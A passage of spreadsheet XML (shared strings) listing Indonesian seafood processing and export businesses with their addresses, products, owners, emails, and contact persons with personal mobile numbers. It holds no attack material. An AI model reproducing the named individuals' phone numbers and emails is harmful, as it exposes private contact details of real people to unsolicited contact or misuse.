    <t>Jl. Cinranae No.1, Kel. Marumpa, Kec. Marusu, Kabupaten Maros</t>
  </si>
  <si>
    <t>SURYA</t>
  </si>
  <si>
    <t>pt.mms@yahoo.com</t>
  </si>
  <si>
    <t>0411-4731304</t>
  </si>
  <si>
    <t>SURYA &amp; 081355105171</t>
  </si>
  <si>
    <t>CV. CHARLIE ERA PRANATA</t>
  </si>
  <si>
    <t>Jl. Alor Komplek PPI Oeba, Kel. Fatubesi, Kec. Kota Lama, Kota Kupang</t>
  </si>
  <si>
    <t>Tuna Loin Beku, Tuna Loin Segar, Ikan Pelagis Beku</t>
  </si>
  <si>
    <t>Warsina Carli Pranata</t>
  </si>
  <si>
    <t>Kota Lama</t>
  </si>
  <si>
    <t>Fatubesi</t>
  </si>
  <si>
    <t>cep_koe@yahoo.co.id</t>
  </si>
  <si>
    <t>Trisnawati, 08123728244</t>
  </si>
  <si>
    <t>Trisnawati</t>
  </si>
  <si>
    <t>PT. MAJU MINA LAUT INDONESIA</t>
  </si>
  <si>
    <t>Jl. Husein Sastranegara No.109 RT 003 RW 010 Room 09, Kel. Benda, Kec. Benda, Kota Tangerang</t>
  </si>
  <si>
    <t>Daging Tuna Beku, Ikan Pelagis Beku, Ikan Demersal Beku, Kerang Beku, Cephalopoda Beku, Salmon Beku, Trout Beku</t>
  </si>
  <si>
    <t>Happy simanjuntak SH.MH</t>
  </si>
  <si>
    <t>pt.majumina@maail.com</t>
  </si>
  <si>
    <t>021-3518105</t>
  </si>
  <si>
    <t>Iis 081317777245</t>
  </si>
  <si>
    <t>GETAS SUPER CAP TANI</t>
  </si>
  <si>
    <t>Jl. Gudang Padi No. 20 RT. 006 RW. 003, Kel. Pasar Padi, Kec. Girimaya, Kota Pangkal Pinang</t>
  </si>
  <si>
    <t>Getas Ikan, Getas Cumi-cumi</t>
  </si>
  <si>
    <t>djoni linardi</t>
  </si>
  <si>
    <t>Girimaya</t>
  </si>
  <si>
    <t>pasar padi</t>
  </si>
  <si>
    <t>getastani19@gmail.com</t>
  </si>
  <si>
    <t>Djoni Linardi (085366760689)</t>
  </si>
  <si>
    <t>PT. YASURIANG SAMUDERA REZEKI</t>
  </si>
  <si>
    <t>Jl. Gabion Pelabuhan Perikanan Belawan No.98, Kel. Bagan Deli, Kec. Medan-Belawan, Kota Medan</t>
  </si>
  <si>
    <t>YASU RIANG</t>
  </si>
  <si>
    <t>Medan-Belawan</t>
  </si>
  <si>
    <t>jeihn11xxxthree77@yahoo.co.id</t>
  </si>
  <si>
    <t>YASU RIANG 085361277788</t>
  </si>
  <si>
    <t>Jl. Ikan Tuna Barat, Komplek SSU Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar</t>
  </si>
  <si>
    <t>Tuna Beku, Cephalopoda Beku</t>
  </si>
  <si>
    <t>srinuraini2015@gmail.com</t>
  </si>
  <si>
    <t>SRI NUR AINI 082399040714</t>
  </si>
  <si>
    <t>PT. WAHYU PRADANA BINAMULIA</t>
  </si>
  <si>
    <t>Jl. Kima 10 Blok T No. 2B, Kel. Daya, Kec. Biringkanaya, Kota Makassar</t>
  </si>
  <si>
    <t>Beku, Segar, Kering</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Ikan Demersal Segar, Cephalopoda Beku, Ikan Pelagis Segar, Ikan Pelagis Beku, Ikan Hasil Budidaya Beku, Tuna Beku, Tuna Segar, Telur Ikan Terbang Beku, Telur Ikan Terbang Kering, Lobster Beku</t>
  </si>
  <si>
    <t>Herman Sentosa</t>
  </si>
  <si>
    <t>widyaindah0806@gmail.com</t>
  </si>
  <si>
    <t>0411-510130</t>
  </si>
  <si>
    <t>Irene Tandililing &amp; 085269050558</t>
  </si>
  <si>
    <t>Paulus Sentosa</t>
  </si>
  <si>
    <t>PT. MALUKU PRIMA SUKSES</t>
  </si>
  <si>
    <t>Jl. Trans, Desa Ureng, Kec. Leihitu, Kabupaten Maluku Tengah</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Ikan Pelagis Beku, Tuna Loin Beku, Tuna Segar, Ikan Pelagis Segar, Tuna Beku</t>
  </si>
  <si>
    <t>Leihitu</t>
  </si>
  <si>
    <t>Ureng</t>
  </si>
  <si>
    <t>khariza@kmlseafood.com</t>
  </si>
  <si>
    <t>0911-3238045</t>
  </si>
  <si>
    <t>Lester 085243640507</t>
  </si>
  <si>
    <t>Lester</t>
  </si>
  <si>
    <t>DUO MITRA RAYA</t>
  </si>
  <si>
    <t>Jalan Cibolang Raya Gang Swadaya RT.28/06, Kel. Cibatu, Kec. Cisaat, Kabupaten Sukabumi</t>
  </si>
  <si>
    <t>Baby Fish, Sereal Patin</t>
  </si>
  <si>
    <t>Imelda Delfina Sibarani</t>
  </si>
  <si>
    <t>Cisaat</t>
  </si>
  <si>
    <t>Cibatu</t>
  </si>
  <si>
    <t>dmrdesain@gmail.com</t>
  </si>
  <si>
    <t>Rani Meldiyani - 085559750373</t>
  </si>
  <si>
    <t>Rani Meldiyani</t>
  </si>
  <si>
    <t>PT. ANUGERAH ALAM INDUSTRI</t>
  </si>
  <si>
    <t>Jl. Jala IV No.32 Lk III, Kel. Rengas Pulau, Kec. Medan Marelan, Kota Medan</t>
  </si>
  <si>
    <t>Cephalopoda Segar, Kepiting Segar, Udang Segar, Ikan Pelagis Segar, Ikan Demersal Segar, Daging Kepiting Rebus Beku, Daging Kerang Rebus Beku, Kepiting Kulit Lunak Beku</t>
  </si>
  <si>
    <t>HARTONO</t>
  </si>
  <si>
    <t>pt.32aaa@gmail.com</t>
  </si>
  <si>
    <t>HARTONO 085261848782</t>
  </si>
  <si>
    <t>Ricco Velasco</t>
  </si>
  <si>
    <t>PT. CARVINNA TRIJAYA MAKMUR</t>
  </si>
  <si>
    <t>Jl. Arnoldus Sompotan, Kel. Aertembaga I, Kec. Aertembaga, Kota Bitung</t>
  </si>
  <si>
    <t>Sarden Kaleng, Mackerel Kaleng, Tuna Kaleng, Tepung Ikan, Tuna Loin Masak Beku</t>
  </si>
  <si>
    <t>AKSEL THENDERAN</t>
  </si>
  <si>
    <t>Aertembaga I</t>
  </si>
  <si>
    <t>admin@carvinnatm.com</t>
  </si>
  <si>
    <t>(0438) 2239136,2239137</t>
  </si>
  <si>
    <t>KEYFIN WOWOR (081340353453)</t>
  </si>
  <si>
    <t>PT. PERIKANAN NUSANTARA CABANG SORONG</t>
  </si>
  <si>
    <t>Jl. A. Yani No.24, Kel. Kampung Baru, Kec. Sorong Kota, Kota Sorong</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Cephalopoda Beku, Tuna Loin Beku</t>
  </si>
  <si>
    <t>M YANA ADITYA</t>
  </si>
  <si>
    <t>perinus_sorong@yahoo.co.id</t>
  </si>
  <si>
    <t>0951-327744</t>
  </si>
  <si>
    <t>ADOLOF/081336354421</t>
  </si>
  <si>
    <t>RATNO TANTRA SURYADI</t>
  </si>
  <si>
    <t>CV. MAJU BERKEMBANG JAYA</t>
  </si>
  <si>
    <t>Desa Temperak No.77 RT 06 RW 01, Kec. Sarang, Kabupaten Rembang</t>
  </si>
  <si>
    <t>Cumi-cumi Kering, Rumput Laut Kering, Perut Ikan Kering</t>
  </si>
  <si>
    <t>NUR KOSIM</t>
  </si>
  <si>
    <t>Temperak</t>
  </si>
  <si>
    <t>mbjayajaya@gmail.com</t>
  </si>
  <si>
    <t>NUR KOSIM 08123507986</t>
  </si>
  <si>
    <t>CV. CAHYA SAMUDRA INTERNASIONAL</t>
  </si>
  <si>
    <t>Jl. Husein Sastranegara No.109 Room 15, Kel. Benda, Kec. Benda, Kota Tangerang</t>
  </si>
  <si>
    <t>Salmon Segar, Trout Segar, Salmon Beku, Trout Beku</t>
  </si>
  <si>
    <t>cahya.samudra.int@gmail.com</t>
  </si>
  <si>
    <t>021-22663711</t>
  </si>
  <si>
    <t>MUSLIM 082220372124/085695811832</t>
  </si>
  <si>
    <t>KOPERASI INKA BANTUL VII PROJO MINO</t>
  </si>
  <si>
    <t>Cold Storage Sadeng, Kel. Songbanyu, Kec. Girisubo, Kabupaten Gunung Kidul</t>
  </si>
  <si>
    <t>Abalone Kering, Ikan Demersal Beku, Tuna Beku, Abalone Beku, Bandeng Beku, Cephalopoda Beku, Teripang Beku, Fillet Ikan Segar, Fillet Ikan Beku</t>
  </si>
  <si>
    <t>Koperasi Inka Bantul VII Projo Mino</t>
  </si>
  <si>
    <t>Girisubo</t>
  </si>
  <si>
    <t>Songbanyu</t>
  </si>
  <si>
    <t>inkamina646@gmail.com</t>
  </si>
  <si>
    <t>Samsuji Rokhmad</t>
  </si>
  <si>
    <t>PT. CAKRAWALA MITRA BAHARI</t>
  </si>
  <si>
    <t>Jl. Wolter Monginsidi No.28, Kel. Nalu, Kec. Baolan, Kabupaten Tolitoli</t>
  </si>
  <si>
    <t>Lainnya, Segar, Beku</t>
  </si>
  <si>
    <t>Kerang Hidup, Kerang Segar, Kerang Beku, Bulu Babi Segar, Bulu Babi Beku, Ikan Pelagis Beku, Tuna Loin Beku, Cephalopoda Beku, Ikan Demersal Beku, Bandeng Beku, Tuna Loin Segar</t>
  </si>
  <si>
    <t>LIOE DJIT BOEI</t>
  </si>
  <si>
    <t>Baolan</t>
  </si>
  <si>
    <t>Nalu</t>
  </si>
  <si>
    <t>rafflythabrani@gmail.com</t>
  </si>
  <si>
    <t>0453 24497</t>
  </si>
  <si>
    <t>HAFIZD THABRANI</t>
  </si>
  <si>
    <t>PT. IMCD INDONESIA</t>
  </si>
  <si>
    <t>Jl. Pembangunan I No.8, Kel. Batuceper, Kec. Batujaya, Kota Tangerang</t>
  </si>
  <si>
    <t>IMCD INDONESIA</t>
  </si>
  <si>
    <t>Serang</t>
  </si>
  <si>
    <t>endang.supriadi@imcd.co.id</t>
  </si>
  <si>
    <t>021-29527355</t>
  </si>
  <si>
    <t>ENDANG SUPRIADI &amp; 08118337531</t>
  </si>
  <si>
    <t>SIA ADELIA</t>
  </si>
  <si>
    <t>PT. NUGRAHA ALAM TUNAS NUSANTARA</t>
  </si>
  <si>
    <t>Batu Kapal RT 002 RW 004, Kel. Ranai, Kec. Bungaran Timur, Kabupaten Natuna</t>
  </si>
  <si>
    <t>Ikan Demersal Segar , Ikan Demersal Beku, Ikan Pelagis Segar, Ikan Pelagis Beku, Cephalopoda Beku, Cephalopoda Segar</t>
  </si>
  <si>
    <t>TOMMISYAR</t>
  </si>
  <si>
    <t>Bungaran Timur</t>
  </si>
  <si>
    <t>Ranai</t>
  </si>
  <si>
    <t>nugrahaalamtunasnusantarapt@gmail.com</t>
  </si>
  <si>
    <t>TOMMISYAR &amp; 081277034040</t>
  </si>
  <si>
    <t>PLANT III PT. TRI MITRA MAKMUR</t>
  </si>
  <si>
    <t>Jl. Pantura Km 9,5, Kel. Landangan, Kec. Kapongan, Kabupaten Situbondo</t>
  </si>
  <si>
    <t>munir@pancamitra.com</t>
  </si>
  <si>
    <t>Kawasan Industri Wijayakusuma Jl. Tugu Industri IV No.3, Kel. Randugarut, Kec. Tugu, Kota Semarang</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar, Tuna Segar, Tuna Loin Segar, Cephalopoda Segar, Udang Segar, Tuna Beku, Kerang Beku, Ikan Demersal Segar</t>
  </si>
  <si>
    <t>jalasembilan@yahoo.com</t>
  </si>
  <si>
    <t>PT. ANUGERAH BERKAH LAUTAN SEJAHTERA</t>
  </si>
  <si>
    <t>Jl. Veteran Lingkar Timur Komplek Pergudangan dan Industri CIP Blok Omega No.3A, Kel. Kemiri, Kec. Sidoarjo, Kabupaten Sidoarjo</t>
  </si>
  <si>
    <t>Teripang Kering, Perut Ikan Kering</t>
  </si>
  <si>
    <t>YUSMAN</t>
  </si>
  <si>
    <t>Kemiri</t>
  </si>
  <si>
    <t>anugerah8899berkah@gmail.com</t>
  </si>
  <si>
    <t>Sutami HP 082131123030</t>
  </si>
  <si>
    <t>SUTAMI</t>
  </si>
  <si>
    <t>PT. ARMADA SANJAYA KUPANG</t>
  </si>
  <si>
    <t>Jl. Alor Fatubesi RT 001 RW 001, Kel. Fatubesi, Kec. Kota Lama, Kota Kupang</t>
  </si>
  <si>
    <t>Fillet Ikan Beku, Ikan Demersal Segar, Ikan Pelagis Segar</t>
  </si>
  <si>
    <t>EFENDI</t>
  </si>
  <si>
    <t>kheni_2000@yahoo.com</t>
  </si>
  <si>
    <t>EFENDI (081238862631)</t>
  </si>
  <si>
    <t>CV. BERKAT MARINA JAYA</t>
  </si>
  <si>
    <t>Kawasan Industri Candi-UKM Blok 20A No.08, Jl. Gatot Subroto, Kel. Ngaliyan, Kec. Ngaliyan, Kota Semarang</t>
  </si>
  <si>
    <t>Udang Kipas Segar, Pari Segar</t>
  </si>
  <si>
    <t>EVAN LAGSA MARTIN</t>
  </si>
  <si>
    <t>berkatmarinajaya@gmail.com</t>
  </si>
  <si>
    <t>024-3541770</t>
  </si>
  <si>
    <t>CV. KEN JAYA PERKASA</t>
  </si>
  <si>
    <t>Desa Kauditan, Kec. Kauditan, Kabupaten Minahasa Utara</t>
  </si>
  <si>
    <t>Beku, Segar, Lainnya, Kering</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Lobster Beku, Tuna Beku, Tuna Segar, Ikan Demersal Beku, Cephalopoda Beku, Kepiting Hidup, Lobster Hidup, Sirip Hiu Kering, Ikan Demersal Hidup</t>
  </si>
  <si>
    <t>JEN PURAJOW</t>
  </si>
  <si>
    <t>kenjayaperkasacv@gmail.com</t>
  </si>
  <si>
    <t>DITA</t>
  </si>
  <si>
    <t>PT. MAHARANI ARTHA PRIMA</t>
  </si>
  <si>
    <t>Jl. Palsigunung RT 003 RW 002, Kel. Mekarsari, Kec. Cimangis, Kota Depok</t>
  </si>
  <si>
    <t>Daging Tuna Beku, Telur Ikan Beku, Bandeng Beku, Gelembung Ikan Kering</t>
  </si>
  <si>
    <t>Titiek Hariati</t>
  </si>
  <si>
    <t>Cimangis</t>
  </si>
  <si>
    <t>Mekarsari</t>
  </si>
  <si>
    <t>maharaniarthaprima@gmail.com</t>
  </si>
  <si>
    <t>021-22674079</t>
  </si>
  <si>
    <t>MUHAMMAD HAMKA / 085394162480</t>
  </si>
  <si>
    <t>titiek hariati</t>
  </si>
  <si>
    <t>CV. GIGA SAMUDRA NUSANTARA</t>
  </si>
  <si>
    <t>Jl. Patimura No.09, Kel. Kedungrejo, Kec. Muncar, Kabupaten Banyuwangi</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Ikan Demersal Beku, Tuna Beku, Cephalopoda Beku, Ikan Air Tawar Beku</t>
  </si>
  <si>
    <t>Ita Latifah</t>
  </si>
  <si>
    <t>mega@giga-samudra.co.id</t>
  </si>
  <si>
    <t>0333 - 594884</t>
  </si>
  <si>
    <t>Pramista Mega / 082143145051</t>
  </si>
  <si>
    <t>PT. INDOPRIMA UTAMA MINA</t>
  </si>
  <si>
    <t>Jl. Cakalang Kompleks Pelabuhan Perikanan Pantai Sorong, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Udang Beku</t>
  </si>
  <si>
    <t>KASLIM</t>
  </si>
  <si>
    <t>utamaminaindoprima@gmail.com</t>
  </si>
  <si>
    <t>CV. ERPA UTAMA</t>
  </si>
  <si>
    <t>Jl. Raya Sambelia, Dusun Batu Baserung, Kel. Gunung Malang, Kec. Pringgabaya, Kabupaten Lombok Timur</t>
  </si>
  <si>
    <t>Tuna Segar, Ikan Demersal Beku, Tuna Loin Segar, Tuna Beku, Fillet Ikan Beku, Ikan Pelagis Segar, Cephalopoda Beku, Ikan Demersal Segar, Ikan Pelagis Beku</t>
  </si>
  <si>
    <t xml:space="preserve">H. Supardi </t>
  </si>
  <si>
    <t>Gunung Malang</t>
  </si>
  <si>
    <t>juhrin.sape@gmail.com</t>
  </si>
  <si>
    <t>H. Supardi +6285239822222</t>
  </si>
  <si>
    <t>H. Supardi</t>
  </si>
  <si>
    <t>TANG SENG</t>
  </si>
  <si>
    <t>Jl. Wisata Bahari No.8 Km 31 RT 006 RW 002, Kel. Kawal, Kec. Gunung Kijang, Kabupaten Bintan</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Ikan Pelagis Beku, Fillet Ikan Beku, Udang Segar</t>
  </si>
  <si>
    <t>TAN ANG KOK</t>
  </si>
  <si>
    <t>kawal.laut.jaya_pt@icloud.com</t>
  </si>
  <si>
    <t>0771-4447498</t>
  </si>
  <si>
    <t>Endy 082388309251</t>
  </si>
  <si>
    <t>CV. AROMA</t>
  </si>
  <si>
    <t>Jl. Cendana No.55 Dusun Silva Lambaroeh, Kel. Ulee Pata, Kec. Jaya Baru, Kota Banda Aceh</t>
  </si>
  <si>
    <t>ISTIQOMAH</t>
  </si>
  <si>
    <t>Ulee Pata</t>
  </si>
  <si>
    <t>aromafood354@gmail.com</t>
  </si>
  <si>
    <t>TAUFIK GUNAWAN</t>
  </si>
  <si>
    <t>PT. EMERALD SEAWEED INDONESIA</t>
  </si>
  <si>
    <t>Jl. Raya Nongkojajar Km 1,4, Kel. Cowek, Kec. Purwodadi, Kabupaten Pasuruan</t>
  </si>
  <si>
    <t>Handi Widjaja</t>
  </si>
  <si>
    <t>Purwodadi</t>
  </si>
  <si>
    <t>Cowek</t>
  </si>
  <si>
    <t>astri.putri@forisa.co.id</t>
  </si>
  <si>
    <t>0343-6755517</t>
  </si>
  <si>
    <t>Astri 08567548696/081310326461</t>
  </si>
  <si>
    <t>Johannes Budijanto</t>
  </si>
  <si>
    <t>AHAR SENTOSA</t>
  </si>
  <si>
    <t>BTN Bukit Karema Indah Blok G No.03, Kel. Karema, Kec. Mamuju, Kabupaten Mamuju</t>
  </si>
  <si>
    <t>Amplang Bandeng, Abon Marlin</t>
  </si>
  <si>
    <t>Hartati Kadir</t>
  </si>
  <si>
    <t>Mamuju</t>
  </si>
  <si>
    <t>Karema</t>
  </si>
  <si>
    <t>aharsentosa@gmail.com</t>
  </si>
  <si>
    <t>Hartati Kadir/ 081355569366</t>
  </si>
  <si>
    <t>PT. AMARTA CARRAGEENAN INDONESIA</t>
  </si>
  <si>
    <t>Desa Jeruk Purut, Kel. Bulusari, Kec. Gempol, Kabupaten Pasuruan</t>
  </si>
  <si>
    <t>KANG SIU MING</t>
  </si>
  <si>
    <t>aguspermana@amarta-group.co.id</t>
  </si>
  <si>
    <t>0343-851406</t>
  </si>
  <si>
    <t>SELFIANA/081231934506</t>
  </si>
  <si>
    <t>SURYA SAPUTRA</t>
  </si>
  <si>
    <t>PT. JASSENDO SENTOSA MANDIRI</t>
  </si>
  <si>
    <t>Pelabuhan Perikanan Dagho, Kel. Dagho, Kec. Tamako, Kabupaten Kepulauan Sangihe</t>
  </si>
  <si>
    <t>AGUSTONO</t>
  </si>
  <si>
    <t>Tamako</t>
  </si>
  <si>
    <t>Gdagho</t>
  </si>
  <si>
    <t>andiwahyu89@icloud.com</t>
  </si>
  <si>
    <t>WAHYU.082259678589 DAN OLIVIA 08229381656</t>
  </si>
  <si>
    <t>ANDI WAHYU HARIS</t>
  </si>
  <si>
    <t>PT. FAJAR FLORES FLAMBOYAN FISHINDO</t>
  </si>
  <si>
    <t>Jl. Hasanudin RT 002 RW 002, Kel. Kota Baru, Kec. Alok Timur, Kabupaten Sikka</t>
  </si>
  <si>
    <t>Ikan Demersal Segar, Fillet Ikan Segar , Tuna Segar, Tuna Loin Segar</t>
  </si>
  <si>
    <t>Joni</t>
  </si>
  <si>
    <t>Alok Timur</t>
  </si>
  <si>
    <t>flamboyanfishindo@gmail.com</t>
  </si>
  <si>
    <t>Sopater 082292692094</t>
  </si>
  <si>
    <t xml:space="preserve"> Sopater A. Tandiarru</t>
  </si>
  <si>
    <t>JONO</t>
  </si>
  <si>
    <t>Jl. Baran Satu Meral RT 002 RW 003, Kel. Baran, Kec. Meral, Kabupaten Karimun</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar, Ikan Demersal Segar, Ikan Demersal Beku, Ikan Pelagis Beku</t>
  </si>
  <si>
    <t>jonoacua@gmail.com</t>
  </si>
  <si>
    <t>0777-31308</t>
  </si>
  <si>
    <t>JONO  0811775883</t>
  </si>
  <si>
    <t>CV. MINA SEJAHTERA</t>
  </si>
  <si>
    <t>Sabang Mawang, Kel. Sabang Mawang, Kec. Pulau Tiga, Kabupaten Natuna</t>
  </si>
  <si>
    <t>HANAFI HJ</t>
  </si>
  <si>
    <t>Sabang Mawang</t>
  </si>
  <si>
    <t>hanafihj8@gmail.com</t>
  </si>
  <si>
    <t>Hanafi HJ/ 0812-7755-7056</t>
  </si>
  <si>
    <t>PT. AGARINDO SAKTI</t>
  </si>
  <si>
    <t>Jl. Haji Syamsuddin Dg Ngerang, Kel. Kalaserena, Kec. Bontonompo, Kabupaten Gowa</t>
  </si>
  <si>
    <t>Norma Mansyur</t>
  </si>
  <si>
    <t>Bontonompo</t>
  </si>
  <si>
    <t>Kalaserena</t>
  </si>
  <si>
    <t>agarindosakti@gmail.com</t>
  </si>
  <si>
    <t>0411-854452</t>
  </si>
  <si>
    <t>Norma Mansyur /082193491275</t>
  </si>
  <si>
    <t>PT. PRIMA BAHARI INTI LESTARI</t>
  </si>
  <si>
    <t>Jl. Kima 12 KAV-5C Makassar, Kel. Daya, Kec. Biringkanaya, Kota Makassar</t>
  </si>
  <si>
    <t>Ikan Demersal Segar, Ikan Demersal Beku, Cephalopoda Segar, Cephalopoda Beku, Tuna Segar, Tuna Beku, Ikan Pelagis Segar, Ikan Pelagis Beku, Udang Segar, Udang Beku, Bandeng Segar, Bandeng Beku</t>
  </si>
  <si>
    <t xml:space="preserve"> LUKMANTO LAWY</t>
  </si>
  <si>
    <t>qcpbil@gmail.com</t>
  </si>
  <si>
    <t>0411 512688</t>
  </si>
  <si>
    <t>KALMA BN WARYA &amp; 085342729113</t>
  </si>
  <si>
    <t>UD. KLA SORONG</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Ikan Demersal Beku, Tuna Loin Beku, Tuna Beku, Cephalopoda Beku</t>
  </si>
  <si>
    <t>DJUSIN IJOSLI LIUSVIA</t>
  </si>
  <si>
    <t>klasorongud@gmail.com</t>
  </si>
  <si>
    <t>DJUSIN IJOSLI LIUSVIA/0811486590</t>
  </si>
  <si>
    <t>PT. SK FOOD INDONESIA CABANG TARAKAN</t>
  </si>
  <si>
    <t>Jl. Tanjung Batu RT 23, Kel. Mamburungan, Kec. Tarakan Timur, Kota Tarakan</t>
  </si>
  <si>
    <t>MICHAEL ANGKODJOJO</t>
  </si>
  <si>
    <t>feryyantojailani@yahoo.com</t>
  </si>
  <si>
    <t>FERY YANTO JAILANI, 082132119992</t>
  </si>
  <si>
    <t>DJOLI LEXI RORONG, SH</t>
  </si>
  <si>
    <t>PT. SUMBER LAUTAN NUSANTARA</t>
  </si>
  <si>
    <t>Jl. Lantebung No.168, Kel. Bira, Kec. Tamalanrea, Kota Makassar</t>
  </si>
  <si>
    <t>Andy Herson Sugiarto</t>
  </si>
  <si>
    <t>yektisln27@gmail.com</t>
  </si>
  <si>
    <t>0411-4720888</t>
  </si>
  <si>
    <t>Yekti Munawaroh &amp; 081220441977</t>
  </si>
  <si>
    <t>Yekti Munawaroh</t>
  </si>
  <si>
    <t>KOPERASI KERAPU</t>
  </si>
  <si>
    <t>Jl. Dermaga No.8, Kel. Purnama, Kec. Dumai Barat, Kota Dumai</t>
  </si>
  <si>
    <t>Ikan Demersal Segar</t>
  </si>
  <si>
    <t>Marnangkok simanjuntak, S.Pt</t>
  </si>
  <si>
    <t>Dumai Barat</t>
  </si>
  <si>
    <t>Purnama</t>
  </si>
  <si>
    <t>koperasikerapu12@gmail.com</t>
  </si>
  <si>
    <t>Marnangkok simanjuntak, S.Pt , 08127593580</t>
  </si>
  <si>
    <t>CV. PERSADA SEMESTA</t>
  </si>
  <si>
    <t>Dusun Cikoang, Kel. Lakatong, Kec. Mangarabombang, Kabupaten Takalar</t>
  </si>
  <si>
    <t>HM SANI AZIS</t>
  </si>
  <si>
    <t>Mangarabombang</t>
  </si>
  <si>
    <t>Lakatong</t>
  </si>
  <si>
    <t>indroz69@yahoo.co.id</t>
  </si>
  <si>
    <t>0411-443101</t>
  </si>
  <si>
    <t>INDRA 08122316970</t>
  </si>
  <si>
    <t>PT. MAQPRO BIOTECH INDONESIA</t>
  </si>
  <si>
    <t>Jl. Raya Desa Jiken Blok I No.8, Kel. Jiken, Kec. Tulangan, Kabupaten Sidoarjo</t>
  </si>
  <si>
    <t>Minyak Ikan, Hidrolisat Udang, Hidrolisat Ikan</t>
  </si>
  <si>
    <t>TSANG JOSHUA ARDY</t>
  </si>
  <si>
    <t>Jiken</t>
  </si>
  <si>
    <t>maqproindo@gmail.com</t>
  </si>
  <si>
    <t>031-99035800</t>
  </si>
  <si>
    <t>Muslik Mahamura - 081357332969</t>
  </si>
  <si>
    <t>PT. KENCANA LAUT NUSANTARA</t>
  </si>
  <si>
    <t>Dermaga Muara Angke No.6 RT 001 RW 011, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Ikan Pelagis Beku, Ikan Demersal Beku, Pari Beku, Udang Kipas Beku, Udang Beku, Kerang Beku, Daging Kepiting Beku, Salmon Beku</t>
  </si>
  <si>
    <t>WILIS</t>
  </si>
  <si>
    <t>amnestiputridwiaditin@gmail.com</t>
  </si>
  <si>
    <t>021-66607183</t>
  </si>
  <si>
    <t>WILIS/081317226888</t>
  </si>
  <si>
    <t>PT. HYDROCOLLOID INDONESIA</t>
  </si>
  <si>
    <t>Kawasan Industri Brantamulya, Jl. Tengsaw No.3 Kp. Babakan RT 004 RW 002, Kel. Tarikolot, Kec. Citeureup, Kabupaten Bogor</t>
  </si>
  <si>
    <t>Budhi Sugiharto Sunjoto</t>
  </si>
  <si>
    <t>Tarikolot</t>
  </si>
  <si>
    <t>sutrisno@hydrocolloid-indonesia.com</t>
  </si>
  <si>
    <t>021-87941318</t>
  </si>
  <si>
    <t>Sutrisno 081338101000</t>
  </si>
  <si>
    <t>PT. TENAGAGANDA SUMATERA</t>
  </si>
  <si>
    <t>Jl. Irian Barat No.253 Pasar V, Kel. Sampali, Kec. Percut Sei Tuan, Kabupaten Deli Serdang</t>
  </si>
  <si>
    <t>Darman</t>
  </si>
  <si>
    <t>Sampali</t>
  </si>
  <si>
    <t>agntj_niq@yahoo.com</t>
  </si>
  <si>
    <t>061-4567543</t>
  </si>
  <si>
    <t>Aguan/ 082157759718</t>
  </si>
  <si>
    <t>Aguan</t>
  </si>
  <si>
    <t>PT. CHAMIN JAYA INTERNATIONAL</t>
  </si>
  <si>
    <t>Jl. Raya Cangkir Km 21 No.302G, Kel. Cangkir, Kec. Driyorejo, Kabupaten Gresik</t>
  </si>
  <si>
    <t>Lee Gwang Suk</t>
  </si>
  <si>
    <t>Cangkir</t>
  </si>
  <si>
    <t>chaminjaya.food@gmail.com</t>
  </si>
  <si>
    <t>031-7508775</t>
  </si>
  <si>
    <t>Hay Prasetyo Putro 085655333992</t>
  </si>
  <si>
    <t>CV. BAURA</t>
  </si>
  <si>
    <t>Jl. Raya Jati, Kel. Labuhan Lombok, Kec. Pringgabaya, Kabupaten Lombok Timur</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Ikan Pelagis Segar, Tuna Beku, Tuna Segar</t>
  </si>
  <si>
    <t>Hajir Hasan</t>
  </si>
  <si>
    <t>askarbaura@gmail.com</t>
  </si>
  <si>
    <t>Hajir Hasan 08199995557</t>
  </si>
  <si>
    <t>PT. PATRIA PERIKANAN LESTARI INDONESIA</t>
  </si>
  <si>
    <t>Jl. Pantai Kompleks Pelabuhan Perikanan Pantai Bacan, Kel. Panamboang, Kec. Bacan Selatan, Kabupaten Halmahera Selatan</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Ikan Demersal Beku, Tuna Loin Beku, Tuna Beku, Ikan Demersal Segar</t>
  </si>
  <si>
    <t>ARSO RIADI</t>
  </si>
  <si>
    <t>patria.fishery17@gmail.com</t>
  </si>
  <si>
    <t>Ranu Rezqia Ramadheka HP. 081391647792</t>
  </si>
  <si>
    <t>Ranu Rezqia Ramadheka</t>
  </si>
  <si>
    <t>MANDIRI USAHA BERSAMA</t>
  </si>
  <si>
    <t>Dusun Harapan Jaya RT 04, Kel. Lalang Jaya, Kec. Manggar, Kabupaten Belitung Timur</t>
  </si>
  <si>
    <t>Jumiati</t>
  </si>
  <si>
    <t>Manggar</t>
  </si>
  <si>
    <t>Lalang Jaya</t>
  </si>
  <si>
    <t>mub.beltim@yahoo.com</t>
  </si>
  <si>
    <t>UD. SUMBER WINDU</t>
  </si>
  <si>
    <t>WIDAGDO</t>
  </si>
  <si>
    <t>sumberwindusoq@gmail.com</t>
  </si>
  <si>
    <t>0951-326988</t>
  </si>
  <si>
    <t>WIDAGDO 081344335252</t>
  </si>
  <si>
    <t>PT. RAHMAT BAHARI INDONESIA</t>
  </si>
  <si>
    <t>Jl. Kima 14 No.F2 SS3, Kel. Daya, Kec. Biringkanaya, Kota Makassar</t>
  </si>
  <si>
    <t>NI NYOMAN RIBEK</t>
  </si>
  <si>
    <t>rbimakassar@yahoo.com</t>
  </si>
  <si>
    <t>NANING SUDIARTI &amp; 081216511127</t>
  </si>
  <si>
    <t>JAMALUDDIN</t>
  </si>
  <si>
    <t>CV. MITRA SEJAHTERA</t>
  </si>
  <si>
    <t>Jl. Ir. Sutami No.38 Blok H2-10, Kel. Parang Loe, Kec. Biringkanaya, Kota Makassar</t>
  </si>
  <si>
    <t>Tarsono Tahir</t>
  </si>
  <si>
    <t>adm.mitrasejahtera02@gmail.com</t>
  </si>
  <si>
